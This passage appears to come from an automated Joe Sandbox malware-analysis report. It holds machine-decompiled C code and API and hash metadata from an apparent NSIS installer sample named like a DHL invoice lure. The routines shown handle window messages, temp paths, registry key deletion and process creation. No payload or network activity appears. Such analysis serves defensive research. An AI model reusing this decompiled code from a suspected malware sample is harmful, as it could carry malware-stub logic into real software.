                                        				__eflags =  *((intOrPtr*)(_t64 - 0x38)) - 0x21;
                                        				_push(1);
                                        				if(__eflags != 0) {
                                        					_t59 = E00402B2C();
                                        					_t32 = E00402B2C();
                                        					asm("sbb ecx, ecx");
                                        					asm("sbb eax, eax");
                                        					_t35 =  ~( *_t31) & _t59;
                                        					__eflags = _t35;
                                        					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                        					goto L10;
                                        				} else {
                                        					_t61 = E00402B0A();
                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                        					_t41 = E00402B0A(2);
                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                        					_t56 =  *(_t64 - 0x20) >> 2;
                                        					if(__eflags == 0) {
                                        						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                        						L10:
                                        						 *(_t64 - 0xc) = _t36;
                                        					} else {
                                        						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                        						asm("sbb eax, eax");
                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                        					}
                                        				}
                                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - _t46;
                                        				if( *((intOrPtr*)(_t64 - 0x34)) >= _t46) {
                                        					_push( *(_t64 - 0xc));
                                        					E00405F38();
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t64 - 4));
                                        				return 0;
                                        			}















                                        0x00401c0a
                                        0x00401c0c
                                        0x00401c13
                                        0x00401c16
                                        0x00401c19
                                        0x00401c23
                                        0x00401c27
                                        0x00401c2a
                                        0x00401c33
                                        0x00401c33
                                        0x00401c36
                                        0x00401c3a
                                        0x00401c43
                                        0x00401c43
                                        0x00401c46
                                        0x00401c4a
                                        0x00401c4c
                                        0x00401ca1
                                        0x00401ca3
                                        0x00401cac
                                        0x00401cb4
                                        0x00401cb7
                                        0x00401cb7
                                        0x00401cc0
                                        0x00000000
                                        0x00401c4e
                                        0x00401c55
                                        0x00401c57
                                        0x00401c5a
                                        0x00401c60
                                        0x00401c67
                                        0x00401c6a
                                        0x00401c92
                                        0x00401cc6
                                        0x00401cc6
                                        0x00401c6c
                                        0x00401c7a
                                        0x00401c82
                                        0x00401c85
                                        0x00401c85
                                        0x00401c6a
                                        0x00401cc9
                                        0x00401ccc
                                        0x00401cd2
                                        0x00402960
                                        0x00402960
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                        • SendMessageA.USER32 ref: 00401C92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                        • Instruction ID: 5540d85999f992b2d0d9c3d63f09df6deeece4c427f082cd61f041684b2cd5b6
                                        • Opcode Fuzzy Hash: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                        • Instruction Fuzzy Hash: 6E216BB1D48208BEEF06AFB4D98AAAD7FB5EB44304F10447EF501B61D1C7B89640DB18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E00405A60(void* __eflags, intOrPtr _a4) {
                                        				int _t11;
                                        				signed char* _t12;
                                        				intOrPtr _t18;
                                        				intOrPtr* _t21;
                                        				void* _t22;
                                        
                                        				E00405FDA(0x421110, _a4);
                                        				_t21 = E00405A0B(0x421110);
                                        				if(_t21 != 0) {
                                        					E00406244(_t21);
                                        					if(( *0x42371c & 0x00000080) == 0) {
                                        						L5:
                                        						_t22 = _t21 - 0x421110;
                                        						while(1) {
                                        							_t11 = lstrlenA(0x421110);
                                        							_push(0x421110);
                                        							if(_t11 <= _t22) {
                                        								break;
                                        							}
                                        							_t12 = E004062DD();
                                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                        								E004059B9(0x421110);
                                        								continue;
                                        							} else {
                                        								goto L1;
                                        							}
                                        						}
                                        						E00405972();
                                        						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                        					}
                                        					_t18 =  *_t21;
                                        					if(_t18 == 0 || _t18 == 0x5c) {
                                        						goto L1;
                                        					} else {
                                        						goto L5;
                                        					}
                                        				}
                                        				L1:
                                        				return 0;
                                        			}








                                        0x00405a6c
                                        0x00405a77
                                        0x00405a7b
                                        0x00405a82
                                        0x00405a8e
                                        0x00405a9a
                                        0x00405a9a
                                        0x00405ab2
                                        0x00405ab3
                                        0x00405aba
                                        0x00405abb
                                        0x00000000
                                        0x00000000
                                        0x00405a9e
                                        0x00405aa5
                                        0x00405aad
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405aa5
                                        0x00405abd
                                        0x00000000
                                        0x00405ad1
                                        0x00405a90
                                        0x00405a94
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405a94
                                        0x00405a7d
                                        0x00000000

                                        APIs
                                          • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7
                                          • Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,74D0FA90,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf4536.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,74D0FA90,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AB3
                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,74D0FA90,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,74D0FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405AC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf4536.tmp
                                        • API String ID: 3248276644-3755126138
                                        • Opcode ID: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
                                        • Instruction ID: fa13fd96d81fd76c8fc81ec80775158a1daeec84e0c55be597840f6fdc29cec0
                                        • Opcode Fuzzy Hash: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
                                        • Instruction Fuzzy Hash: D5F0C825305D6616D62233361C85EAF1649CE82364715473FF851B12D3DB3C8943DE7E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405972(CHAR* _a4) {
                                        				CHAR* _t7;
                                        
                                        				_t7 = _a4;
                                        				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                        					lstrcatA(_t7, 0x409014);
                                        				}
                                        				return _t7;
                                        			}




                                        0x00405973
                                        0x0040598a
                                        0x00405992
                                        0x00405992
                                        0x0040599a

                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405978
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405981
                                        • lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 00405992
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405972
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3916508600
                                        • Opcode ID: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
                                        • Instruction ID: 0da8bf888325795cdd0c5347214511d48edcf337a1f8d4df24ff951c9a6f7455
                                        • Opcode Fuzzy Hash: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
                                        • Instruction Fuzzy Hash: C7D0A9A2605A716AD21223199C09EDB2A0CCF02314B080063F600B22A3CA3C1D018BFE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E00402C2E(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                        				void* _v8;
                                        				char _v272;
                                        				void* _t19;
                                        				signed int _t25;
                                        				intOrPtr* _t27;
                                        				signed int _t32;
                                        				signed int _t33;
                                        				signed int _t34;
                                        
                                        				_t33 = _a12;
                                        				_t34 = _t33 & 0x00000300;
                                        				_t32 = _t33 & 0x00000001;
                                        				_t19 = E00405E60(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8);
                                        				if(_t19 == 0) {
                                        					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                        						__eflags = _t32;
                                        						if(__eflags != 0) {
                                        							RegCloseKey(_v8);
                                        							return 0x3eb;
                                        						}
                                        						_t25 = E00402C2E(__eflags, _v8,  &_v272, _a12);
                                        						__eflags = _t25;
                                        						if(_t25 != 0) {
                                        							break;
                                        						}
                                        					}
                                        					RegCloseKey(_v8);
                                        					_t27 = E00406372(3);
                                        					if(_t27 == 0) {
                                        						return RegDeleteKeyA(_a4, _a8);
                                        					}
                                        					return  *_t27(_a4, _a8, _t34, 0);
                                        				}
                                        				return _t19;
                                        			}











                                        0x00402c39
                                        0x00402c42
                                        0x00402c4b
                                        0x00402c57
                                        0x00402c5e
                                        0x00402c82
                                        0x00402c68
                                        0x00402c6a
                                        0x00402cbd
                                        0x00000000
                                        0x00402cc3
                                        0x00402c79
                                        0x00402c7e
                                        0x00402c80
                                        0x00000000
                                        0x00000000
                                        0x00402c80
                                        0x00402c9c
                                        0x00402ca4
                                        0x00402cab
                                        0x00000000
                                        0x00402cd0
                                        0x00000000
                                        0x00402cb6
                                        0x00402cda

                                        APIs
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Close$Enum
                                        • String ID:
                                        • API String ID: 464197530-0
                                        • Opcode ID: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
                                        • Instruction ID: a6da729fb9552a58d385ec1c0953cf8d4b7f97d7084d0a629d1ed2eab5a533bf
                                        • Opcode Fuzzy Hash: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
                                        • Instruction Fuzzy Hash: 8E115B32904109BBEF129F50DE09B9E7B6DEB54380F104072BE05B51E0E7B59E11AAA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405A0B(CHAR* _a4) {
                                        				CHAR* _t5;
                                        				char* _t7;
                                        				CHAR* _t9;
                                        				char _t10;
                                        				CHAR* _t11;
                                        				void* _t13;
                                        
                                        				_t11 = _a4;
                                        				_t9 = CharNextA(_t11);
                                        				_t5 = CharNextA(_t9);
                                        				_t10 =  *_t11;
                                        				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                                        					if(_t10 != 0x5c || _t11[1] != _t10) {
                                        						L10:
                                        						return 0;
                                        					} else {
                                        						_t13 = 2;
                                        						while(1) {
                                        							_t13 = _t13 - 1;
                                        							_t7 = E0040599D(_t5, 0x5c);
                                        							if( *_t7 == 0) {
                                        								goto L10;
                                        							}
                                        							_t5 = _t7 + 1;
                                        							if(_t13 != 0) {
                                        								continue;
                                        							}
                                        							return _t5;
                                        						}
                                        						goto L10;
                                        					}
                                        				} else {
                                        					return CharNextA(_t5);
                                        				}
                                        			}









                                        0x00405a14
                                        0x00405a1b
                                        0x00405a1e
                                        0x00405a20
                                        0x00405a24
                                        0x00405a39
                                        0x00405a58
                                        0x00000000
                                        0x00405a40
                                        0x00405a42
                                        0x00405a43
                                        0x00405a46
                                        0x00405a47
                                        0x00405a4f
                                        0x00000000
                                        0x00000000
                                        0x00405a51
                                        0x00405a54
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405a54
                                        0x00000000
                                        0x00405a43
                                        0x00405a31
                                        0x00000000
                                        0x00405a32

                                        APIs
                                        • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,74D0FA90,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                        • CharNextA.USER32(00000000), ref: 00405A1E
                                        • CharNextA.USER32(00000000), ref: 00405A32
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsf4536.tmp, xrefs: 00405A0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsf4536.tmp
                                        • API String ID: 3213498283-3147736861
                                        • Opcode ID: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
                                        • Instruction ID: a4ce128402f48f1feafc2c55b1118e7c053650975221e3f5fcc16cd8d0856992
                                        • Opcode Fuzzy Hash: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
                                        • Instruction Fuzzy Hash: 13F0C251B04F916BFB32A2280CD4F6B5B88CB55365F145267E280672C2C27C88408F9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00402D60(intOrPtr _a4) {
                                        				long _t2;
                                        				struct HWND__* _t3;
                                        				struct HWND__* _t6;
                                        
                                        				if(_a4 == 0) {
                                        					__eflags =  *0x41e8c0; // 0x0
                                        					if(__eflags == 0) {
                                        						_t2 = GetTickCount();
                                        						__eflags = _t2 -  *0x423710;
                                        						if(_t2 >  *0x423710) {
                                        							_t3 = CreateDialogParamA( *0x423700, 0x6f, 0, E00402CDD, 0);
                                        							 *0x41e8c0 = _t3;
                                        							return ShowWindow(_t3, 5);
                                        						}
                                        						return _t2;
                                        					} else {
                                        						return E004063AE(0);
                                        					}
                                        				} else {
                                        					_t6 =  *0x41e8c0; // 0x0
                                        					if(_t6 != 0) {
                                        						_t6 = DestroyWindow(_t6);
                                        					}
                                        					 *0x41e8c0 = 0;
                                        					return _t6;
                                        				}
                                        			}






                                        0x00402d67
                                        0x00402d81
                                        0x00402d87
                                        0x00402d91
                                        0x00402d97
                                        0x00402d9d
                                        0x00402dae
                                        0x00402db7
                                        0x00000000
                                        0x00402dbc
                                        0x00402dc3
                                        0x00402d89
                                        0x00402d90
                                        0x00402d90
                                        0x00402d69
                                        0x00402d69
                                        0x00402d70
                                        0x00402d73
                                        0x00402d73
                                        0x00402d79
                                        0x00402d80
                                        0x00402d80

                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,00402F3E,00000001), ref: 00402D73
                                        • GetTickCount.KERNEL32 ref: 00402D91
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                        • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
                                        • Instruction ID: 88e2776c24fdb891b0502b3cf10dbd42b902845c03a9ebe61091678d0ea3e225
                                        • Opcode Fuzzy Hash: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
                                        • Instruction Fuzzy Hash: E0F05E75905221ABCA207B62BE4CACA7BA4FB42B527014976F845B31E4C3784C868BDD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E00405075(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                        				int _t11;
                                        				int _t15;
                                        				long _t16;
                                        
                                        				_t15 = _a8;
                                        				if(_t15 != 0x102) {
                                        					__eflags = _t15 - 0x200;
                                        					if(_t15 != 0x200) {
                                        						_t16 = _a16;
                                        						L7:
                                        						__eflags = _t15 - 0x419;
                                        						if(_t15 == 0x419) {
                                        							__eflags =  *0x41fcf4 - _t16; // 0x0
                                        							if(__eflags != 0) {
                                        								_push(_t16);
                                        								_push(6);
                                        								 *0x41fcf4 = _t16;
                                        								E00404A3B();
                                        							}
                                        						}
                                        						L11:
                                        						return CallWindowProcA( *0x41fcfc, _a4, _t15, _a12, _t16);
                                        					}
                                        					_t11 = IsWindowVisible(_a4);
                                        					__eflags = _t11;
                                        					if(_t11 == 0) {
                                        						L10:
                                        						_t16 = _a16;
                                        						goto L11;
                                        					}
                                        					_t16 = E004049BB(_a4, 1);
                                        					_t15 = 0x419;
                                        					goto L7;
                                        				}
                                        				if(_a12 == 0x20) {
                                        					E004040B4(0x413);
                                        					return 0;
                                        				}
                                        				goto L10;
                                        			}






                                        0x00405079
                                        0x00405083
                                        0x00405099
                                        0x0040509f
                                        0x004050c1
                                        0x004050c4
                                        0x004050c4
                                        0x004050ca
                                        0x004050cc
                                        0x004050d2
                                        0x004050d4
                                        0x004050d5
                                        0x004050d7
                                        0x004050dd
                                        0x004050dd
                                        0x004050d2
                                        0x004050e7
                                        0x00000000
                                        0x004050f5
                                        0x004050a4
                                        0x004050aa
                                        0x004050ac
                                        0x004050e4
                                        0x004050e4
                                        0x00000000
                                        0x004050e4
                                        0x004050b8
                                        0x004050ba
                                        0x00000000
                                        0x004050ba
                                        0x00405089
                                        0x00405090
                                        0x00000000
                                        0x00405095
                                        0x00000000

                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 004050A4
                                        • CallWindowProcA.USER32 ref: 004050F5
                                          • Part of subcall function 004040B4: SendMessageA.USER32 ref: 004040C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
                                        • Instruction ID: 69794148541a1a4d8d7be296dba567d41b1ee09d4c6a2f8e6d5670bc2f98cc64
                                        • Opcode Fuzzy Hash: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
                                        • Instruction Fuzzy Hash: 3F017171100649ABDF219F11DD80A9F7A65EB84314F208037FA017A2D1D77A9C51DEEA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405679(CHAR* _a4) {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				int _t7;
                                        
                                        				0x421510->cb = 0x44;
                                        				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x421510,  &_v20);
                                        				if(_t7 != 0) {
                                        					CloseHandle(_v20.hThread);
                                        					return _v20.hProcess;
                                        				}
                                        				return _t7;
                                        			}





                                        0x00405682
                                        0x004056a2
                                        0x004056aa
                                        0x004056af
                                        0x00000000
                                        0x004056b5
                                        0x004056b9

                                        APIs
